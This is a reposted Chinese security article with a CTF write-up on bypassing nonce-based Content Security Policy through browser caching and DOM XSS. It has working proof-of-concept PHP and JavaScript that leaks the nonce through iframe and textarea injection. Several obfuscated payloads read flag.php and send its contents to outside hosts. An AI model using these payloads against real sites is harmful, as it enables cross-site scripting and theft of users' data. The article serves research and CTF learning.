内容简介:通过浏览器缓存来bypass nonce script CSP
* 本文原创作者:LoRexxar,本文属于FreeBuf原创奖励计划,未经许可禁止转载
最近看了去年google团队写的文章CSP Is Dead, Long Live CSP!,对csp有了新的认识,在文章中,google团队提出了nonce-{random}的csp实现方式,而事实上,在去年的圣诞节,Sebastian 演示了这种csp实现方式的攻击方式,也就是利用浏览器缓存来攻击,现在来详细分析下。
漏洞分析
原文查看: http://sirdarckcat.blogspot.jp/2016/12/how-to-bypass-csp-nonces-with-dom-xss.html
国内的翻译(只有翻译): http://paper.seebug.org/166/
首先我需要个demo
首先是实现了nonce script的站,然后包含了因为是利用了浏览器缓存,所以我们不能对页面发起请求,因为发起请求之后,后台就会刷新页面并刷新nonce的字符串,符合条件的只有3种。
1. 持久型 DOM XSS,当攻击者可以强制将页面跳转至易受攻击的页面,并且 payload 不包括在缓存的响应中(需要提取)。 2. 包含第三方 HTML 代码的 DOM XSS 漏洞(例如,fetch(location.pathName).then(r=>r.text()).then(t=>body.innerHTML=t);) 3. XSS payload 存在于 location.hash 中的 DOM XSS 漏洞(例如 https://victim/xss#!foo?payload=)
这里首先我们需要一个开启了nonce script规则的站,并加入一个xss点
/csp/test.php <?php function random_string( $length = 8 ) { $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; $password = ''; for($i = 0; $i < $length; $i++) { $password .= $chars[ mt_rand(0, strlen($chars) - 1) ]; } return $password; } $random = random_string(12); header('Content-Security-Policy: default-src \'none\'; script-src \'nonce-'.$random .'\';'); header('Cache-Control: max-age=99999999'); ?> <script nonce='<?php echo $random;?>'>document.write('URL ' + unescape(location.href))</script><script nonce='<?php echo $random;?>'>console.log('another nonced script')</script>
iframe引用
然后我们需要利用iframe引入这个页面,并对其发起请求获取页面内容,这里我们通过向其中注入一个<textarea>标签来吃掉后面的script标签,这样就可以获取内容。
attack.php <iframe id="frame" src="[http://127.0.0.1/ctest/csp/test.php#](http://127.0.0.1/ctest/csp/test.php#)<form method='post' action='[http://127.0.0.1/ctest/nonce_receiver.php](http://127.0.0.1/ctest/nonce_receiver.php)'><input type='submit' value='test!'><textarea name='nonce'>"></iframe> <script> function getNonce() { var xhr = new XMLHttpRequest(); xhr.open("GET", "nonce_receiver.php", false); xhr.send(); return xhr.responseText; } setTimeout(pollNonce, 1000); function pollNonce() { var nonce = getNonce(); if (nonce == "") { setTimeout(pollNonce, 1000); } else { attack(nonce); } } function attack(nonce) { var iframe = document.createElement("iframe"); var url = "[http://127.0.0.1/ctest/csp/test.php#](http://127.0.0.1/ctest/csp/test.php#)" var payload = "<script nonce='" + nonce + "'>alert(document.domain)</scr" + "ipt>" var validationPayload = "<script>alert('If you see this alert, CSP is not active')</scr" + "ipt>" iframe.src = url + payload + validationPayload; document.body.appendChild(iframe); } </script>
获取nonce字符串
然后我们需要一个页面去获取nonce字符串,为了反复获得,这里需要开启session。
<?php session_start(); if(!empty($_POST)){ $message = $_POST['nonce']; preg_match('/(nonce=\')\w+\'/', $message, $matches); $nonce_number = substr($matches[0], 7, -1); $_SESSION['nonce'] = $nonce_number; echo $nonce_number; }else if(!empty($_SESSION['nonce'])){ echo $_SESSION['nonce']; } ?>
一切就绪了,唯一的问题就是在nonce script上,由于csp开启的问题,我们没办法自动实现自动提交,也就是攻击者必须要使按钮被点击,才能实现一次攻击。
nonce绕过实例-pwnhub绝对防御
为了研究整个漏洞的限制性,我专门写了一个pwnhub的题目。题目环境大概是这样的。
前台是个聊天版,可以发给任何人,有简单的xss过滤,但是可以随便绕过
在admin的聊天版里可以找到后台的信息,通过构造任意xss获得后台地址。
Wow, good guys,maybe you want /adminshigesha233e3333/#admin
打开看一眼发现敏感信息
右键看源码是这样的
存在dom xss,看看返回头还可以发现更多信息。
服务端不但开启了最新版的nonce csp,而且还开启了浏览器缓存
这就让我们有了可乘之机,就如同上面提到的一样,如果我们仅修改location.hash,浏览器不会请求服务器,那么nonce string就不会更换。
那么思路就很清楚了,我们可以在主站构造xss,先开iframe请求admin目录的,获取到nonce值后,再新建一个iframe,添加带有nonce字符串的iframe窗口,执行任意xss
<iframe src="/adminshigesha233e3333#a"></iframe>
<scrscriptipt>
window.oonnload=setTimeout(functioonn(){
var f=document.getElementsByTagName("iframe")[0];
var
n=f.coonntentWindow.document.getElementsByTagName("scrscriptipt")[0].
getAttribute("noonnce");
coonnsole.log(n);
var f2=document.createElement("iframe");
var u="/adminshigesha233e3333#";
var p="<scr"+"ipt noonnce='"+n+"'
src='../static/js/jquery.min.js'></scr"+"ipt><scri"+"pt
noonnce='"+n+"'>$.get('/adminshigesha233e3333/flag.php',functioonn(da
ta){top.locatioonn.href='//x.x.x.x/?c='+escape(data)});</scr"+"ipt>";
f2.src=u+p;
document.body.appendChild(f2);
},1000);
</scrscriptipt>
总结
但是让我回过头来总结下上面的利用条件:
1、目标站开启了缓存机制。
2、目标站同源下存在未被csp保护的存在xss的站点。
但事实上,我们本可以用更简单的方式获得目标站的flag,比如构造一个iframe引入flag.php,然后读iframe内容,在同源的情况下是允许的。
payload如下
<iframe src="./adminshigesha233e3333/#<iframe src='./flag.php' id=xss>" id=xss2> <scscriptript> functioonn x(){ var inner = document.getElementById("xss2").coonntentDocument.getElementById("xss").coonntentDocum ent.body.innerHTML; var xml = new XMLHttpRequest(); xml.open('POST', '[http://52.80.63.91/api/addmessage.php](http://52.80.63.91/api/addmessage.php)', true); xml.setRequestHeader("Coonntent-type","applicatioonn/x-www-form-urlencoded"); xml.send('to=sss&message='+escape(inner)); }; setTimeout("x()",2000); </scscriptript>
那么如果admin站点和xss站点非同源呢?由于同源策略的影响,你不能从父窗口获取子窗口的内容,那么就只能通过点击劫持的方式,来发送请求,payload如前面漏洞分析时讲到的。
payload如下
<iframe id="frame" src="[http://52.80.63.91/adminshigesha233e3333/#](http://52.80.63.91/adminshigesha233e3333/#)<form method='post' actioonn='[http://115.28.78.16/noonnce.php](http://115.28.78.16/noonnce.php)'><input type='submit' value='test!'><textarea name='noonnce'>"></iframe> <scriscriptpt> if(locatioonn.pathname != "/xsstest_new/api/getmessage.php"){ window.locatioonn.href = "http://" + document.domain + "/xsstest_new/api/getmessage.php" } functioonn getNoonnce() { var xhr = new XMLHttpRequest(); xhr.open("GET", "[http://115.28.78.16/noonnce.php](http://115.28.78.16/noonnce.php)", false); xhr.send(); return xhr.respoonnseText; } setTimeout(pollNoonnce, 1000); functioonn pollNoonnce() { var noonnce = getNoonnce(); if (noonnce == "") { setTimeout(pollNoonnce, 1000); } else { attack(noonnce); } } functioonn attack(noonnce) { var iframe = document.createElement("iframe"); var url = "[http://52.80.63.91/adminshigesha233e3333/#](http://52.80.63.91/adminshigesha233e3333/#)" var payload = "<scriscriptpt noonnce='" + noonnce + "'>var xmlhttp = new XMLHttpRequest(); xmlhttp.open(\\"GET\\", \\"flag.php\\", false); xmlhttp.send(); var mess = xmlhttp.respoonnse; var xhr = new XMLHttpRequest(); locatioonn.href=\\"[http://0xb.pw?](http://0xb.pw?)\\"+mess;</scr" + "ipt>"; iframe.src = url + payload; document.body.appendChild(iframe); } </script>
如果被攻击者点击提交按钮,那么攻击者就可以获取想要的所有信息了。
回顾漏洞,我们不难发现整个漏洞处处都受到同源策略的限制,而且如果在chrome环境下,还会受到xss auditor的限制,所以虽然nonce script csp存在理论被绕过的可能,但是被作为CSP的新解决方案来说,前景仍然光明。
* 本文原创作者:LoRexxar,本文属于FreeBuf原创奖励计划,未经许可禁止转载
以上所述就是小编给大家介绍的《通过浏览器缓存来bypass nonce script CSP》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- HTTP缓存 - 强缓存/协商缓存/浏览器刷新
- http系列--彻底理解浏览器的缓存机制(http缓存机制)
- url输入后的整个流程(4)-http缓存/浏览器缓存
- 浏览器的缓存机制
- 彻底弄懂浏览器缓存策略
- 深入理解浏览器的缓存机制
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
数值方法和MATLAB实现与应用
拉克唐瓦尔德 / 机械工业出版社 / 2004-9 / 59.00元
本书是关于数值方法和MATLAB的介绍,是针对高等院校理工科专业学生编写的教材。数值方法可以用来生成其他方法无法求解的问题的近似解。本书的主要目的是为应用计算打下坚实的基础,由简单到复杂讲述了标准数值方法在实际问题中的实现和应用。本书通篇使用良好的编程习惯向读者展示了如何清楚地表达计算思想及编制文档。书中通过给读者提供大量的可直接运行的代码库以及讲解MARLAB工具箱中内置函数使用的数量方法,帮助......一起来看看 《数值方法和MATLAB实现与应用》 这本书的介绍吧!